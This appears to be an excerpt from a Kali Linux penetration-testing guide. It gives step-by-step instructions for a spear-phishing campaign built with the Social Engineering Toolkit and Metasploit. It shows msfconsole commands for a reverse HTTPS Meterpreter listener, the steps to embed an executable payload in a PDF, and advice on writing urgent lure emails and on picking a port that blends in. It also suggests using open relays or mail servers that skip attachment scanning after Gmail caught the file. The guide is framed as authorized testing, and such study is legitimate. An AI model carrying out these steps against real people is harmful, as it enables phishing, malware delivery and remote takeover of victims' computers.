Creating a Spear-Phishing Attack with the Social Engineering Toolkit

The Social Engineering Toolkit (SET) license agreement states that SET is designed purely for good and not evil. Any use of this tool for malicious purposes that are unauthorized by the owner of the network and equipment violates the terms of service (TOS) and license of this toolset. To find this tool, go through the menu Kali Linux | Exploitation Tools | Social Engineering Toolkit, or type setoolkit on the command line:

Creating a Spear-Phishing Attack with the Social Engineering Toolkit

This is going to be a Metasploit reverse HTTP exploit, so there are a couple of steps that you have to put in place before using SET:

Start the Metasploit service.

Creating a Spear-Phishing Attack with the Social Engineering Toolkit

In Kali 1.x, this was two steps, but in Kali 2.0, the previous image, starting the service, and the next image, opening the Metasploit Framework Console, are one command:

Creating a Spear-Phishing Attack with the Social Engineering Toolkit
  1. Start up the Metasploit console by going through the menus Applications | 08. Exploitation Tools | Metasploit Framework. You can also start the Metasploit Framework Console by typing msfconsole at the command prompt, avoiding the GUI menu altogether.
  2. Ascertain the local host address your listener will be listening on, so that your malware has something to phone home to. In our test network, the Kali server is running on a virtual machine running on a physical host. Either the host's IP or a bridged pseudo-ethernet card from the virtual machine must be the destination when the malware calls in. If you were running your Kali from a VMS machine on the Internet, this would be slightly less difficult.
  3. Here are the configs for the test network. There are two machines with Internet access and two servers that are only accessible from the internal network. Kali 186 is the attacker's laptop, and the Windows 10 workstation is the jump box for the internal network.
  4. Once you have started Metasploit, you need to start the listener, so the malware you are about to create has something to answer the call when it phones home.

    Type the following command in the msf command prompt:

    use exploit/multi/handler
    set PAYLOAD windows/meterpreter/reverse_https
    set LHOST
    set LPORT 4343

The listener is an open running process, and so the cursor does not return to the ready state. To evidence that the listener is active, we can run a port scan against it with NMap:

Creating a Spear-Phishing Attack with the Social Engineering Toolkit

On the other side, the listener responded to the NMap scan with a readout of the data from the scan:

Creating a Spear-Phishing Attack with the Social Engineering Toolkit

Using the following diagram, we can see that the source of the scan is marked by the listener, and all the scan requests are recorded as coming from, which is the internal IP of the Kali machine:

Creating a Spear-Phishing Attack with the Social Engineering Toolkit

The malware we are going to create will be an executable file wrapped in a PDF file. This will be an attachment on an e-mail that is from a purportedly safe source, to an identified systems administrator in the target company. We will start with a review of the menu structure of SET.

The main menu has six entries and an exit cue:

  1. Social-Engineering Attacks
  2. Fast-Track Penetration Testing
  3. Third-Party Modules
  4. Update the Social-Engineer Toolkit
  5. Update SET configuration
  6. Help, Credits, and About
  7. Exit the Social Engineering Toolkit

Under Social-Engineering Attacks, there are eleven entries:

  1. Spear-Phishing Attack Vectors
  2. Website Attack Vectors
  3. Infectious Media Generator
  4. Create a Payload and Listener
  5. Mass Mailer Attack
  6. Arduino-Based Attack Vector
  7. Wireless Access Point Attack Vector
  8. QRCode Generator Attack Vector
  9. Powershell Attack Vectors
  10. Third Party Modules
  11. Return back to the main menu

Using Spear-Phishing Attack Vectors, there are four options:

  1. Perform a Mass Email Attack
  2. Create a FileFormat Payload
  3. Create a Social-Engineering Template
  4. Return to Main Menu

Since we are going to set up a persistent threat that lets us stay in command of the victim's machine, and have to overcome a user's possible reluctance to double-click an attachment, we have to create an irresistible Spear-Phishing mail piece. To do this properly, it is important to have done effective reconnaissance ahead of time.

Company address books and calendars are useful for creating the urgency needed to get an e-mail opened. Just like with marketing by e-mail, either legitimate or spammy, a spear-phishing e-mail title has to be interesting, intriguing, or frightening to the victim:

Creating a Spear-Phishing Attack with the Social Engineering Toolkit

This e-mail is short, interesting, and can create urgency by greed. The attachment could be any of the following:

  • A zip file, presumed to have a document inside
  • A Word document
  • A PDF file

The Social Engineering Toolkit gives 21 possible payloads. Some of these will work better on a Macintosh operating systems than Windows Systems. Most Windows workstations are not provisioned to handle RAR-compressed files. The choices here are as follows:

  1. SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
  2. SET Custom Written Document UNC LM SMB Capture Attack
  3. MS14-017 Microsoft Word RTF Object Confusion (2014-04-01)
  4. Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
  5. Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
  6. Adobe Flash Player "Button" Remote Code Execution
  7. Adobe CoolType SING Table "uniqueName" Overflow
  8. Adobe Flash Player "newfunction" Invalid Pointer Use
  9. Adobe Collab.collectEmailInfo Buffer Overflow
  10. Adobe Collab.getIcon Buffer Overflow
  11. Adobe JBIG2Decode Memory Corruption Exploit
  12. Adobe PDF Embedded EXE Social Engineering
  13. Adobe util.printf() Buffer Overflow
  14. Custom EXE to VBA (sent via RAR) (RAR required)
  15. Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
  16. Adobe PDF Embedded EXE Social Engineering (NOJS)
  17. Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
  18. Apple QuickTime PICT PnSize Buffer Overflow
  19. Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
  20. Adobe Reader u3D Memory Corruption Vulnerability
  21. MSCOMCTL ActiveX Buffer Overflow (ms12-027)
Creating a Spear-Phishing Attack with the Social Engineering Toolkit

Let's just choose the default, which is item 12. When you hit Enter, the next screen lets you use a doctored PDF file of your own devising, or use the built-in blank PDF. Choosing the second option, we see seven further options:

  1. Windows Reverse TCP Shell
  2. Windows Meterpreter Reverse_TCP
  3. Windows Reverse VNC DLL
  4. Windows Reverse TCP Shell (x64)
  5. Windows Meterpreter Reverse_TCP (X64)
  6. Windows Shell Bind_TCP (X64)
  7. Windows Meterpreter Reverse HTTPS
Creating a Spear-Phishing Attack with the Social Engineering Toolkit

Since three of the options are going to run code that gets the victim machine to phone home to your Metasploit Framework Meterpreter tool, and you have been practicing with that tool, it might make sense to choose one of those as your evil payload. Let's choose option seven, Windows Meterpreter Reverse HTTPS.

When we type 7 we get several options:

  1. IP address of the listener (LHOST): Use the host address where you are going to have the listener. My Kali workstation thinks it is
  2. Port to connect back to [443]: Port 443 is default here, but you can have the listener at any port on your listening device. 443 is the HTTPS port, so it would not look unusual by its number. Port 12234 would look unusual and might also be blocked if the firewall administrators are whitelisting approved ports, and blacklisting all the others.
  3. It states that payloads are sent to /root/.set/template.pdf directory.
    Creating a Spear-Phishing Attack with the Social Engineering Toolkit

    This is not what it does. The executable is set as legit.exe in this case. When you enter the name of the file as in the following image, you need to use the full path:

  4. Once you have chosen the name of the PDF, fire up the Social-Engineering Toolkit Mass E-Mailer.

    The mailer will use an open mail relay, if you have found one, a Gmail account, or any legitimate e-mail SMTP server. SET does not contain its own SMTP server. You might want to find a free e-mail service that you can use for this purpose, or use an open relay mail server.

    Creating a Spear-Phishing Attack with the Social Engineering Toolkit
  5. Choose, or write a new e-mail message:

    SE Toolkit allows you to choose several different tasty e-mail subjects for your Phishing e-mail attack, and you can easily add new templates to customize the approach. The fourth choice in the list below is the one we just created:

    Creating a Spear-Phishing Attack with the Social Engineering Toolkit
  6. For this test of the system, I chose to send the attack to and from a Gmail account over which I have control. SE Toolkit does not return to the mailer section in the event of an error in sending the message. Gmail caught the bogus PDF file and sent back a link to its security pages:
    Creating a Spear-Phishing Attack with the Social Engineering Toolkit
  7. Use an e-mail account from a server that does not check for infected attachments. We used and sent the e-mail to , and the send worked:
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